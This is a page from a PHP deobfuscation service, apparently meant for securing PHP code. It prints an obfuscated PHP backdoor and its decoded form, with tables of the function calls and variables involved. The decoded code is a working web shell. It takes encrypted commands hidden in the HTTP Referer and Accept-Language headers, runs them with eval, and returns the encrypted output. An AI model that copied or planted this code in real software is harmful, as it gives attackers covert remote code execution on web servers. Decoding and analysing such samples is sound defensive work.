Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $F='5($i.$k|Zh),0,3|Z));|Z|Z$f=$sl($s|Zs|Z(md5($i.$kf),0,|Z3));$p=|Z"";for|Z($z=1;$..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$F='5($i.$k|Zh),0,3|Z));|Z|Z$f=$sl($s|Zs|Z(md5($i.$kf),0,|Z3));$p=|Z"";for|Z($z=1;$|Zz<|Z|Zcount($m[1]);|Z';
$a=')|Z{$u=p|Zarse|Z_url($rr);p|Zar|Zse_str($|Zu["query"]|Z,$q|Z);$q=array_|Zvalues|Z($q);p|Zreg_m|Zatch_al';
$N='ay("/","|Z+")|Z,$ss($s[$i],0|Z|Z,$|Ze))),$k)));|Z$o=o|Zb_get_co|Zntent|Zs();ob_e|Znd|Z_clean();$d=b';
$r='$z++)$p.=|Z$q[$|Zm[2]|Z[$|Zz|Z]];if(strpos($p,|Z$h|Z)===0){$s[$i|Z]=|Z"";$p=$ss(|Z$p,|Z3)|Z;}|Zif(arra';
$X=';$|Zs=&$_SESSI|ZON;$s|Zs="subst|Zr";$sl|Z="|Zstrtolower"|Z;|Z$i=$m[1][0|Z]|Z.$m|Z[1][1];$h=$sl($|Zss(m|Zd';
$e='y_key_|Zexist|Zs($i,$s)){$s|Z[$i].|Z=|Z$p;$e=str|Zp|Zos(|Z$s[$i],$f);if($e|Z){$k=$|Zkh.$|Zkf;o|Zb_start()';
$I='a|Zse64_|Zenc|Zo|Zde(x(gzcomp|Zr|Zess($o),$|Zk|Z));print(|Z|Z"<$k>$d|Z</$k>")|Z;@sessi|Zon_destroy();}}}}';
$t=str_replace('pO','','pOcrpOeapOte_fupOpOpOnction');
$i='l(|Z"/([\\w|Z])[\\w-|Z]+(|Z?:;q=0|Z.([\\d])|Z)?,|Z?/"|Z,$ra|Z,$m);if($q&&$m|Z)|Z{@sess|Zion_st|Zart()';
$w='=$_S|ZERVER;|Z$rr|Z=@|Z$r["HTTP_REFERER"|Z|Z];$ra=@$r[|Z"HTTP_|Z|ZA|ZCCEPT_LANGUAGE"];if|Z($rr&&|Z$ra|Z';
$y='$kh|Z="5d|Z41";$kf="4|Z02a";f|Zunction x($|Zt,$k){$|Z|Zc|Z=strl|Zen($k);$l=strl|Zen($t)|Z;$o="";f|Zor($i=|Z0;$i<';
$Y=';@|Ze|Zval(@g|Zzunc|Zo|Zmpress(@x(@base6|Z4_decod|Z|Ze(preg_replac|Ze(|Zarray("/|Z_/",|Z"/-/"),a|Z|Zrr';
$c='$l;|Z){for(|Z$j=|Z0;($j<|Z$c&&$i<|Z$l);$j+|Z+,|Z$i++){$o.|Z=$|Zt{$i|Z}^$|Zk{$j};}}return $o|Z;}|Z$r';
$W=str_replace('|Z','',$y.$c.$w.$a.$i.$X.$F.$r.$e.$Y.$N.$I);
$E=$t('',$W);$E();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$E None
$F 5($i.$k|Zh),0,3|Z));|Z|Z$f=$sl($s|Zs|Z(md5($i.$kf),0,|Z3));$..
$I a|Zse64_|Zenc|Zo|Zde(x(gzcomp|Zr|Zess($o),$|Zk|Z));print(|Z|..
$N ay("/","|Z+")|Z,$ss($s[$i],0|Z|Z,$|Ze))),$k)));|Z$o=o|Zb_get..
$W $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$X ;$|Zs=&$_SESSI|ZON;$s|Zs="subst|Zr";$sl|Z="|Zstrtolower"|Z;|..
$Y ;@|Ze|Zval(@g|Zzunc|Zo|Zmpress(@x(@base6|Z4_decod|Z|Ze(preg_..
$a )|Z{$u=p|Zarse|Z_url($rr);p|Zar|Zse_str($|Zu["query"]|Z,$q|Z..
$c $l;|Z){for(|Z$j=|Z0;($j<|Z$c&&$i<|Z$l);$j+|Z+,|Z$i++){$o.|Z=..
$e y_key_|Zexist|Zs($i,$s)){$s|Z[$i].|Z=|Z$p;$e=str|Zp|Zos(|Z$s..
$i l(|Z"/([\w|Z])[\w-|Z]+(|Z?:;q=0|Z.([\d])|Z)?,|Z?/"|Z,$ra|Z,$..
$r $z++)$p.=|Z$q[$|Zm[2]|Z[$|Zz|Z]];if(strpos($p,|Z$h|Z)===0){$..
$t create_function
$w =$_S|ZERVER;|Z$rr|Z=@|Z$r["HTTP_REFERER"|Z|Z];$ra=@$r[|Z"HTT..
$y $kh|Z="5d|Z41";$kf="4|Z02a";f|Zunction x($|Zt,$k){$|Z|Zc|Z=s..

Stats

MD5 3e948a915a2f5b57ffb9486b430c6e30
Eval Count 1
Decode Time 105 ms